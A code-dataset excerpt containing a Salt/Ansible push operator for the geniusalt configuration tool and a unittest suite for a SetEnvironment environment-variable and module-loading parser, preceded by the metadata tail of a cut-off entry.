\n","repo_name":"Turbotice/bubbles","sub_path":"bubbles/velocity/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39496181614","text":"from geniusalt.models import Node, Instance, Module, Cluster\nfrom geniusalt.config import LOG_PATH, SALT_BIN, ANSIBLE_BIN, ANSIBLE_PLAYBOOKS, ANSIBLE_MODULE_INIT, ANSIBLE_SSH_USER_KEY, USE_ANSIBLE\nfrom .relation_operator import RelationOperator\nfrom .common import *\n\nfrom threading import Thread\nfrom datetime import datetime\nfrom collections import OrderedDict\nimport os, json\n\n\nclass SimulPush(Thread):\n def __init__(self, node_name, pillar):\n self.node_name=node_name\n self.pillar = pillar\n self.push_result=None\n super().__init__()\n\n def run(self):\n self.push_result = self.pushOneNode()\n\n def get_playbook(mod):\n return os.path.join(ANSIBLE_PLAYBOOKS, mod, ANSIBLE_MODULE_INIT)\n\n def pushOneNode(self):\n ### prepare log storage.\n log_dir = os.path.join(LOG_PATH, self.node_name)\n if not 
os.path.isdir(log_dir):\n os.makedirs(log_dir)\n _file = 'push_at_{:%Y-%m-%d_%H%M%S}.log'.format(datetime.now())\n log_file = os.path.join(log_dir, _file)\n\n ### make the cmdline string.\n _cmd = ANSIBLE_BIN if USE_ANSIBLE else SALT_BIN\n _node = self.node_name\n _modules = ','.join(self.pillar.keys())\n _pillar = json.dumps(self.pillar)\n\n if USE_ANSIBLE:\n log_ret = []\n for mod in self.pillar:\n for instance in self.pillar[mod]:\n log_ret.append(\"----> push log for instance: {}\".format(instance))\n\n _modules = os.path.join(ANSIBLE_PLAYBOOKS, mod, ANSIBLE_MODULE_INIT)\n _pillar = json.dumps(self.pillar[mod][instance])\n cmd_line = '{} -i {}, {} -e \\'{}\\' --private-key={}'.format(_cmd, _node, _modules, _pillar, ANSIBLE_SSH_USER_KEY)\n\n print(\"\\n===> ansible-playbook: \" + cmd_line)\n with os.popen(cmd_line) as stream:\n for line in stream:\n log_ret.append(line)\n with open(log_file,'at') as log_file_o:\n log_file_o.writelines(log_ret)\n return log_ret\n else:\n cmd_line = '{} {} state.sls {} pillar=\\'{}\\''.format(_cmd, _node, _modules, _pillar)\n\n ### do salt push and write results to log file.\n print(\"\\n===> saltstack: \" + cmd_line)\n with open(log_file,'at') as log_file_o, os.popen(cmd_line) as stream:\n log_ret = [line for line in stream]\n log_file_o.writelines(log_ret)\n return log_ret\n\n\n\nclass PushOperator(Operator):\n fields_defination = {\n 'nodes': ListType(item_type=ObjectType(Node)),\n 'clusters': ListType(item_type=ObjectType(Cluster)),\n 'bind_modules': ListType(item_type=ObjectType(Module)),\n 'bind_instances': ListType(item_type=ObjectType(Instance)),\n '--only-module': BoolType(),\n '--all-instances': BoolType(),\n # '--checkself': BoolType(),\n }\n\n def _check_lock(self, objects, object_type, lock_field='is_lock'):\n for o in objects:\n if getattr(o, lock_field) != 0:\n return self.set_error(\"ERROR: Push action aborted because {} '{}' has been locked.\".format(object_type,o.name))\n return objects\n\n @fields_validator(f_required=[],f_optional=['nodes', 'clusters', 'bind_modules', 'bind_instances', '--only-module', '--all-instances'],\n check_obj_exists=False)\n def push(self):\n \"\"\"\n To push Module or Instance to Nodes. This makes the real installation for a real host.\n Main logic:\n If no module and instance specified, all objects bound on these nodes will be pushed. If you want to push all modules without any instance, use '--only-module'.\n If any module or instance specified, only the specified modules or instances will be pushed to nodes, not all objects bound on nodes.\n If only modules specified, modules will be pushed without any instances. If you want to push all instances in modules, use '--all-instances'.\n \"\"\"\n _chp = self.checked_parameters\n\n ### If specified, to bind Modules or Instances to Nodes first.\n if self.parameters.get('bind_modules') or self.parameters.get('bind_instances'):\n if self.parameters.get('clusters'):\n return self.set_error(\"ERROR: implicit binding is not allowed for cluster objects. 
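 pushOneNode above interpolates JSON straight into a single-quoted shell string, so any apostrophe inside a pillar value would break out of the quoting. A defensive sketch using shlex.quote; the binary path and push target are placeholders, not the project's actual config: import json import shlex salt_bin = "/usr/bin/salt" # placeholder for SALT_BIN node, modules = "web01", "nginx" # hypothetical push target pillar = {"nginx": {"motd": "it's fine"}} # the apostrophe would break naive quoting cmd_line = "{} {} state.sls {} pillar={}".format( salt_bin, shlex.quote(node), shlex.quote(modules), shlex.quote(json.dumps(pillar))) print(cmd_line) # safe to hand to os.popen; the JSON arrives as one shell token 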
\")\n bind_operator = RelationOperator(self.parameters.copy())\n bind_operator.bind()\n if not bind_operator.result:\n return self.set_error(bind_operator.error_message, http_status=bind_operator.http_status)\n\n nodes = _chp.get('nodes')\n ### To check locked objects.\n clusters = self._check_lock(self.pop_field('clusters', default=[]), 'CLuster')\n instances = self._check_lock(self.pop_field('bind_instances', default=[]), 'Instance')\n modules = self._check_lock(self.pop_field('bind_modules', default=[]), 'Module', lock_field='lock_count')\n\n ### BoolType parameters usage checking.\n if (clusters is None) or (instances is None) or (modules is None):\n return None # Means some obj is locked. Push work aborted.\n if (instances or modules) and _chp['--only-module']:\n return self.set_error(\"ERROR: '--only-module' cannot be used with specified instances or modules.\")\n if instances and _chp['--all-instances']:\n return self.set_error(\"ERROR: '--all-instances' cannot be used with specified instances.\")\n\n if not (nodes or clusters):\n return self.set_error(\"ERROR: nodes or clusters must be provide.\")\n if (nodes or instances or modules) and clusters:\n return self.set_error(\"ERROR: clusters cannot be pushed together with other objects. \")\n\n ### To make pillar dict for each node.\n pillar_total = {}\n if not clusters:\n for n in nodes:\n _np = n.pillar # pillars from all bound objects on this nodes with environment evaluated.\n\n if modules and _chp['--all-instances']:\n _pillar = {m.name:_np[m.name] for m in modules}\n else:\n _pillar = {m.name:{} for m in modules + [i.module_belong for i in instances]}\n\n for i in instances:\n _m = i.module_belong.name\n _pillar[_m][i.name] = _np[_m][i.name]\n\n if not _pillar: # Means no module or instance specified.\n _pillar = {m:{} for m in _np} if _chp['--only-module'] else _np\n\n pillar_total[n.name] = _pillar\n else:\n nodes = []\n for c in clusters:\n if not c.bind_instance:\n return self.set_error(\"ERROR: Cluster '{}' did not bind to any instances, nothing to push.\".format(c.name))\n for n in c.node_set.all():\n nodes.append(n)\n _m = c.bind_instance.module_belong.name\n _i = c.bind_instance.name\n _i_pillar = n.pillar[_m][_i]\n _i_pillar.update({'__cluster__': c.pillar}) ### the main purpose\n _pillar = {_m: {_i: _i_pillar}}\n pillar_total[n.name] = _pillar\n\n ### check lock status of nodes to be pushed.\n nodes = self._check_lock(nodes, 'Node')\n\n ### To push objects to real hosts in multi-threading.\n thread_pool = {}\n self.pushlog = OrderedDict()\n for n in nodes:\n if not pillar_total[n.name]:\n self.pushlog[n.name] = [\"Warning: Pushing ignored Node '{}', no object bound on this node.\".format(n.name)]\n else:\n thread_pool[n.name] = SimulPush(n.name, pillar_total[n.name])\n thread_pool[n.name].start()\n for n_name in thread_pool:\n thread_pool[n_name].join()\n self.pushlog[n_name] = thread_pool[n_name].push_result\n","repo_name":"alan011/geniusalt","sub_path":"operators/push_operator.py","file_name":"push_operator.py","file_ext":"py","file_size_in_byte":8077,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"41409107744","text":"#!/usr/bin/env python\n# -*- coding: utf-8; mode: python; py-indent-offset: 4; py-continuation-offset: 4 -*-\n\"\"\"\n\"\"\"\nfrom __future__ import print_function\nimport sys\n\n\nsys.dont_write_bytecode = True\n\nimport os\nimport subprocess\n\n\nsys.path.insert(1, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nfrom 
pprint import pprint\n\nimport unittest\nfrom unittest import TestCase\n\n# Coverage will always miss one of these depending on the system\n# and what is available.\ntry: # pragma: no cover\n import unittest.mock as mock # pragma: no cover\nexcept: # pragma: no cover\n import mock # pragma: no cover\n\nfrom mock import Mock\nfrom mock import MagicMock\nfrom mock import patch\n\nimport filecmp\nfrom textwrap import dedent\n\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\nfrom setenvironment import *\n\nfrom .common import *\n\n#===============================================================================\n#\n# General Utility Functions\n#\n#===============================================================================\nglobal_gen_new_ground_truth_files = False\n#global_gen_new_ground_truth_files = True # Re-generate 'ground truth' files, comment out for production.\n\n#===============================================================================\n#\n# General Utility Functions\n#\n#===============================================================================\n\n#===============================================================================\n#\n# Mock Helpers\n#\n#===============================================================================\n\n\n\ndef mock_function_return_1(*args, **kwargs):\n print(\"[mock] Generic function override - returns 1\")\n return 1\n\n\n\ndef mock_distutils_spawn_find_executable_NotFound(*args, **kwargs):\n \"\"\"\n Mock a call to ``distutils.spawn.find_executable()`` that returns None\n \"\"\"\n print(\"[mock] distutils.spawn.find_executable - NotFound\")\n #if True: raise FileNotFoundError(\"Generated by MOCK\")\n return None\n\n\n\ndef mock_shutil_which_None(*args, **kwargs):\n \"\"\"\n Mock a call to ``shutil.which()`` that returns None\n \"\"\"\n print(\"[mock] shutil.which - NotFound\")\n #if True: raise FileNotFoundError(\"Generated by MOCK\")\n return None\n\n\n\nclass mock_popen_status_error_rc0(mock_popen):\n \"\"\"\n Specialization of popen mock.\n\n Simulates the results from a modulecmd operation that had\n an error loading a module (maybe not found). 
Modulecmd will tend\n to have a message like \"ERROR: could not load module\" in its stderr\n field but it will generally return an exit status of 0.\n \"\"\"\n\n def __init__(self, cmd, bufsize=None, shell=None, stdout=None, stderr=None):\n super(mock_popen_status_error_rc0, self).__init__(cmd, bufsize, shell, stdout, stderr)\n\n def communicate(self):\n print(\"mock_popen> communicate()\")\n stdout = b\"_mlstatus = False\\n\"\n stderr = b\"ERROR: Unable to locate a modulefile for 'gcc/1.2.3'\\n\"\n self.returncode = 0\n return (stdout, stderr)\n\n\n\nclass mock_popen_status_error_rc1(mock_popen):\n \"\"\"\n Specialization of popen mock that will return with error.\n\n Test the condition where modulecmd returned a status of 1 and\n has `ERROR:` in its stderr field.\n \"\"\"\n\n def __init__(self, cmd, stdout=None, stderr=None):\n super(mock_popen_status_error_rc1, self).__init__(cmd, stdout, stderr)\n\n def communicate(self):\n print(\"mock_popen> communicate()\")\n stdout = b\"_mlstatus = False\\n\"\n stderr = b\"ERROR: Unable to locate a modulefile for 'gcc/1.2.3'\\n\"\n self.returncode = 1\n return (stdout, stderr)\n\n\n\n#===============================================================================\n#\n# Tests\n#\n#===============================================================================\n\n\n\nclass SetEnvironmentTest(TestCase):\n \"\"\"\n Main test driver for the SetEnvironment class\n \"\"\"\n\n def setUp(self):\n print(\"\")\n self.maxDiff = None\n self._filename = find_config_ini(filename=\"config_test_setenvironment.ini\")\n\n # Get the location of the unit testing scripts (for file writing tests)\n unit_test_path = os.path.realpath(__file__)\n self.unit_test_file = os.path.basename(unit_test_path)\n self.unit_test_path = os.path.dirname(unit_test_path)\n\n def test_SetEnvironment_Template(self):\n \"\"\"\n Basic template test for SetEnvironment.\n\n This test doesn't really validate any output -- it just runs a basic check.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = \"CONFIG_A+\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_parse_all_sections(self):\n \"\"\".ini files have a DEFAULT section that is implied even if it\n doesn't exist. 
This test makes sure things don't w00f if we parse\n ``DEFAULT``\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = \"ENVVAR_SET_FOO\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n parser.parse_all_sections()\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n # check one of the sections parsed\n actions_expected = [{'op': 'envvar_set', 'envvar': 'FOO', 'value': 'BAR'}]\n actions_actual = parser.actions[section]\n self.assertListEqual(actions_expected, actions_actual)\n for i in range(len(actions_expected)):\n self.assertDictEqual(actions_expected[i], actions_actual[i])\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_load_envvars_sec(self):\n \"\"\"\n Load just the section that contains the ENVVAR commands.\n \"\"\"\n section = \"CONFIG_A\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n #parser.exception_control_level = 4\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_load_modules_sec(self):\n \"\"\"\n Load just the section that contains the MODULE commands.\n \"\"\"\n section = \"CONFIG_B\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n #parser.exception_control_level = 4\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_property_actions_default(self):\n \"\"\"\n Test the ``actions`` property default value.\n \"\"\"\n section = \"CONFIG_A+\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # Check the default value\n actions_default_expected = {}\n actions_default_actual = parser.actions\n print(\"Default `actions` property = {}\".format(actions_default_actual))\n self.assertEqual(\n actions_default_actual,\n actions_default_expected,\n msg=\"Default actions property value should be `{}`\"\n )\n\n print(\"OK\")\n\n def test_SetEnvironment_property_actions_setter(self):\n \"\"\"\n Test the ``actions`` property setter\n \"\"\"\n section = \"CONFIG_A+\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # Check a valid assignment\n actions_value_new = {}\n parser.actions = actions_value_new\n parser_actions_expected = actions_value_new\n parser_actions_actual = parser.actions\n self.assertDictEqual(parser_actions_actual, parser_actions_expected)\n\n # Check an invalid type assignment\n actions_value_new = None\n with self.assertRaises(TypeError):\n parser.actions = actions_value_new\n\n print(\"OK\")\n\n def 
test_SetEnvironment_method_print_actions(self):\n \"\"\"\n Coverage check for ``pretty_print_actions``, including an injected unknown operation.\n\n Mostly this test just ensures we're getting coverage.\n\n Todo: add a value check to the output at some point. For now, it doesn't make\n sense due to ongoing development.\n \"\"\"\n section = \"CONFIG_A+\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 2\n #parser.exception_control_level = 4\n\n # parse a section\n data = parser.parse_section(section)\n\n # inject an 'unknown-op' into the actions list.\n parser.actions[section].append({'module': '???', 'op': 'unknown-op', 'value': '???'})\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"OK\")\n\n def test_SetEnvironment_handler_envvar_remove(self):\n \"\"\"\n Additional checks for envvar_remove\n \"\"\"\n section = \"CONFIG_TEST_ENVVAR_REMOVE\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n #parser.exception_control_level = 4\n\n # parse a section\n data = parser.parse_section(section)\n\n # Validate the output\n actions_expected = [\n {\n 'op': 'module_use', 'module': None, 'value': '/foo/bar/baz'\n }, {\n 'op': 'envvar_set', 'envvar': 'BAR', 'value': 'foo'\n }\n ]\n\n print(\"Verify Matching `actions`:\")\n print(\"Expected:\")\n pprint(actions_expected, width=90, indent=4)\n print(\"Actual\")\n pprint(parser.actions[section], width=90, indent=4)\n\n self.assertListEqual(actions_expected, parser.actions[section])\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_pretty_print_envvars(self):\n \"\"\"\n Test the filtering options of ``pretty_print_envvars``.\n \"\"\"\n section = \"CONFIG_A\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n #parser.exception_control_level = 4\n print(\"\")\n envvar_include_filter = [\"SETENVIRONMENT_TEST_\"]\n\n os.environ[\"SETENVIRONMENT_TEST_ENVVAR_001\"] = \"foobar\"\n os.environ[\"SETENVIRONMENT_HIDDEN_ENVVAR_001\"] = \"baz\"\n\n with patch('sys.stdout', new=StringIO()) as m_stdout:\n parser.pretty_print_envvars(envvar_filter=envvar_include_filter)\n self.assertIn(\"SETENVIRONMENT_TEST_ENVVAR_001 = foobar\", m_stdout.getvalue())\n self.assertIn(\"SETENVIRONMENT_HIDDEN_ENVVAR_001\", m_stdout.getvalue())\n self.assertNotIn(\"SETENVIRONMENT_HIDDEN_ENVVAR_001 = baz\", m_stdout.getvalue())\n\n # Filtered + keys_only should print out only the one key\n with patch('sys.stdout', new=StringIO()) as m_stdout:\n parser.pretty_print_envvars(envvar_filter=envvar_include_filter, filtered_keys_only=True)\n self.assertIn(\"SETENVIRONMENT_TEST_ENVVAR_001 = foobar\", m_stdout.getvalue())\n self.assertNotIn(\"SETENVIRONMENT_HIDDEN\", m_stdout.getvalue())\n\n # No options should print all envvars + values\n with patch('sys.stdout', new=StringIO()) as m_stdout:\n parser.pretty_print_envvars()\n self.assertIn(\"SETENVIRONMENT_TEST\", m_stdout.getvalue())\n self.assertIn(\"SETENVIRONMENT_HIDDEN\", m_stdout.getvalue())\n\n # No filter + filtered_keys_only should still print all keys + values.\n with patch('sys.stdout', new=StringIO()) as m_stdout:\n parser.pretty_print_envvars(filtered_keys_only=True)\n self.assertIn(\"SETENVIRONMENT_TEST\", m_stdout.getvalue())\n self.assertIn(\"SETENVIRONMENT_HIDDEN\", m_stdout.getvalue())\n\n 
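# Hedged extra check (an editorial addition, not part of the original\n # suite): the asserts above suggest ``envvar_filter`` matches keys by\n # substring, so a longer prefix of the same key should behave the same way.\n with patch('sys.stdout', new=StringIO()) as m_stdout:\n parser.pretty_print_envvars(envvar_filter=[\"SETENVIRONMENT_TEST_ENVVAR\"], filtered_keys_only=True)\n self.assertIn(\"SETENVIRONMENT_TEST_ENVVAR_001\", m_stdout.getvalue())\n\n 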
# cleanup\n del os.environ[\"SETENVIRONMENT_TEST_ENVVAR_001\"]\n del os.environ[\"SETENVIRONMENT_HIDDEN_ENVVAR_001\"]\n\n return\n\n def test_SetEnvironment_method_apply_section_badtype(self):\n \"\"\"\n Give a bad type for ``section`` in ``apply(section)``.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = None\n print(\"Section : {}\".format(section))\n\n with self.assertRaises(TypeError):\n parser.apply(section)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_envvar_test_01(self):\n \"\"\"\n Apply the envvar actions from ``CONFIG_A`` and verify the resulting environment.\n \"\"\"\n section = \"CONFIG_A\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n parser.apply(section)\n\n self.assertTrue(\"BAR\" in os.environ.keys())\n self.assertEqual(\"foo\", os.environ[\"BAR\"])\n\n parser.pretty_print_envvars([\"BAR\"], True)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_envvar_test_02(self):\n \"\"\"\n Apply an ``envvar_unset`` operation and verify the envvar is removed.\n \"\"\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n section = \"ENVVAR_UNSET_TEST\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n parser.apply(section)\n\n self.assertFalse(\"FOO\" in os.environ.keys())\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n @patch('subprocess.run', side_effect=mock_run_status_ok)\n def test_SetEnvironment_method_apply_module_test(self, arg_run):\n \"\"\"\n Apply the module actions from ``CONFIG_B`` using a mocked ``subprocess.run``.\n \"\"\"\n section = \"CONFIG_B\" # modules\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n parser.apply(section)\n\n envvar_truth = [(\"TEST_SETENVIRONMENT_GCC_VER\", \"7.3.0\")]\n for ienvvar_name, ienvvar_val in envvar_truth:\n self.assertTrue(ienvvar_name in os.environ.keys())\n self.assertEqual(ienvvar_val, os.environ[ienvvar_name])\n\n print(\"\")\n envvar_filter = [\"TEST_SETENVIRONMENT_\"]\n parser.pretty_print_envvars(envvar_filter, True)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_module_use_badpath(self):\n \"\"\"\n Test that a ``module use <bad path>`` will trigger an\n appropriate exception.\n \"\"\"\n section = \"MODULE_USE_BADPATH\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # parse a section\n data = 
parser.parse_section(section)\n\n # Pretty print the actions\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n # - the missing file will generate a RuntimeError, but the message\n # that will get generated down in the ``exception_control_event``\n # should have the details.\n with self.assertRaises(RuntimeError):\n parser.apply(section)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_module_load_noexist(self):\n \"\"\"\n Test that we correctly deal with module loads that fail\n because the module didn't exist.\n\n This might not really easily be testable because applications\n like ``modulecmd`` and ``lmod`` tend to \"fail gracefully\" without\n returning a nonzero status code.\n\n This kind of stuff is why we might want to roll our own wrapper\n to those commands someday that is better than what we currently\n have in ModuleHelper.\n \"\"\"\n section = \"MODULE_LOAD_NOEXIST\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions but use our popen mock routine that emulates\n # a bad output.\n with self.assertRaises(RuntimeError):\n\n # Patch in our version of Popen which will emulate what a 'module load'\n # of a missing module will return. This is for consistency because it\n # seems modulecmd does slightly different things across different\n # platforms.\n # This should ensure that we take the 'right' path in ModuleHelper.module\n # that we want to test here and trigger the RuntimeError.\n with patch('subprocess.run', side_effect=mock_run_status_ok):\n with patch('subprocess.Popen', side_effect=mock_popen_status_error_rc0):\n parser.apply(section)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_envvar_expansion(self):\n \"\"\"\n Tests that an envvar expansion will properly be executed\n during ``apply()``. 
Uses the following ``.ini`` file section:\n\n [ENVVAR_VAR_EXPANSION]\n envvar_set ENVVAR_PARAM_01 : \"AAA\"\n envvar_set ENVVAR_PARAM_02 : \"B${ENVVAR_PARAM_01}B\"\n envvar_set ENVVAR_PARAM_03 : ${ENVVAR_PARAM_01} -- ${ENVVAR_PARAM_02} -- ${ADFASF}\n\n The expected result should be:\n - ``ENVVAR_PARAM_01`` = \"AAA\"\n - ``ENVVAR_PARAM_02`` = \"BAAAB\"\n - ``ENVVAR_PARAM_03`` = \"AAA -- BAAAB -- ${ADFASF}\"\n\n \"\"\"\n section = \"ENVVAR_VAR_EXPANSION\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n parser.apply(section)\n\n envvar_truth = [\n (\"ENVVAR_PARAM_01\", \"AAA\"), (\"ENVVAR_PARAM_02\", \"BAAAB\"),\n (\"ENVVAR_PARAM_03\", \"AAA -- BAAAB -- ${ADFASF}\")\n ]\n for ienvvar_name, ienvvar_val in envvar_truth:\n self.assertTrue(ienvvar_name in os.environ.keys())\n self.assertEqual(ienvvar_val, os.environ[ienvvar_name])\n\n print(\"\")\n envvar_filter = [\"ENVVAR_PARAM_\"]\n parser.pretty_print_envvars(envvar_filter, True)\n\n del os.environ['ENVVAR_PARAM_01']\n del os.environ['ENVVAR_PARAM_02']\n del os.environ['ENVVAR_PARAM_03']\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_envvar_parameter_check(self):\n \"\"\"\n Test the ``_apply_envvar()`` method's type checking of parameters.\n \"\"\"\n section = \"ENVVAR_VAR_EXPANSION\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # Test #1 : TypeError should be raised if operation is not a str type.\n operation = None\n envvar_name = \"FOO\"\n envvar_value = \"BAR\"\n with self.assertRaises(TypeError):\n parser._apply_envvar(operation, envvar_name, envvar_value)\n\n # Test #2 : TypeError should be raised if envvar_name is not a str type.\n operation = \"envvar_set\"\n envvar_name = None\n envvar_value = \"BAR\"\n with self.assertRaises(TypeError):\n parser._apply_envvar(operation, envvar_name, envvar_value)\n\n # Test #3 : TypeError should be raised if envvar_value is not a str or None type.\n operation = \"envvar_set\"\n envvar_name = \"FOO\"\n envvar_value = 12345\n with self.assertRaises(TypeError):\n parser._apply_envvar(operation, envvar_name, envvar_value)\n\n # Test #4 : A ValueError will be raised if an unknown operation is given.\n operation = \"envvar_unknown\"\n envvar_name = \"FOO\"\n envvar_value = \"BAR\"\n with self.assertRaises(ValueError):\n parser._apply_envvar(operation, envvar_name, envvar_value)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_module_parameter_check(self):\n \"\"\"\n Test the ``_apply_module()`` method's type checking of parameters.\n \"\"\"\n section = \"MODULE_LOAD_OK\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n # Test #1 : TypeError should be raised if operation is not a str type.\n operation = None\n module_name = \"gcc\"\n module_value = \"7.3.0\"\n with self.assertRaises(TypeError):\n with patch('subprocess.Popen', side_effect=mock_popen_status_ok):\n parser._apply_module(operation, module_name, module_value)\n\n # Test #2 : TypeError should be raised if 
module_name is not a str or None type.\n operation = \"module_load\"\n module_name = 12345\n module_value = \"7.3.0\"\n with self.assertRaises(TypeError):\n with patch('subprocess.Popen', side_effect=mock_popen_status_ok):\n parser._apply_module(operation, module_name, module_value)\n\n # Test #3 : TypeError should be raised if module_value is not a str or None type.\n operation = \"module_load\"\n module_name = \"gcc\"\n module_value = 12345\n with self.assertRaises(TypeError):\n with patch('subprocess.Popen', side_effect=mock_popen_status_ok):\n parser._apply_module(operation, module_name, module_value)\n\n # Test #4 : ValueError is raised if an unknown module operation is provided.\n operation = \"module_undefined\"\n module_name = \"gcc\"\n module_value = \"7.3.0\"\n with self.assertRaises(ValueError):\n with patch('subprocess.Popen', side_effect=mock_popen_status_ok):\n parser._apply_module(operation, module_name, module_value)\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_envvar_expansion_missing(self):\n \"\"\"\n Tests that an envvar expansion will properly handle a missing envvar\n during expansion. The following .ini section is used to test this:\n\n [ENVVAR_VAR_EXPANSION_BAD]\n envvar_set ENVVAR_PARAM_01 : \"B${ENVVAR_PARAM_MISSING}B\"\n\n Historically this caused a ``KeyError`` to be raised during ``apply()``;\n the current implementation expands via ``os.path.expandvars()``, which\n leaves unknown ``${...}`` references intact (see the note below).\n\n Todo:\n Is this test still valid now that a missing envvar inside the\n string no longer raises a KeyError during 'apply', since\n ``os.path.expandvars()`` won't throw if the envvar isn't around?\n \"\"\"\n section = \"ENVVAR_VAR_EXPANSION_BAD\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n #with self.assertRaises(KeyError):\n # parser.apply(section)\n # !!! Note: the envvar in string is now being processed via ``os.path.expandvars()``\n # which does not raise a KeyError if it finds an envvar-like thing. Instead,\n # it'll just keep the \"${stuff}\" string intact if it finds no envvar.\n\n 
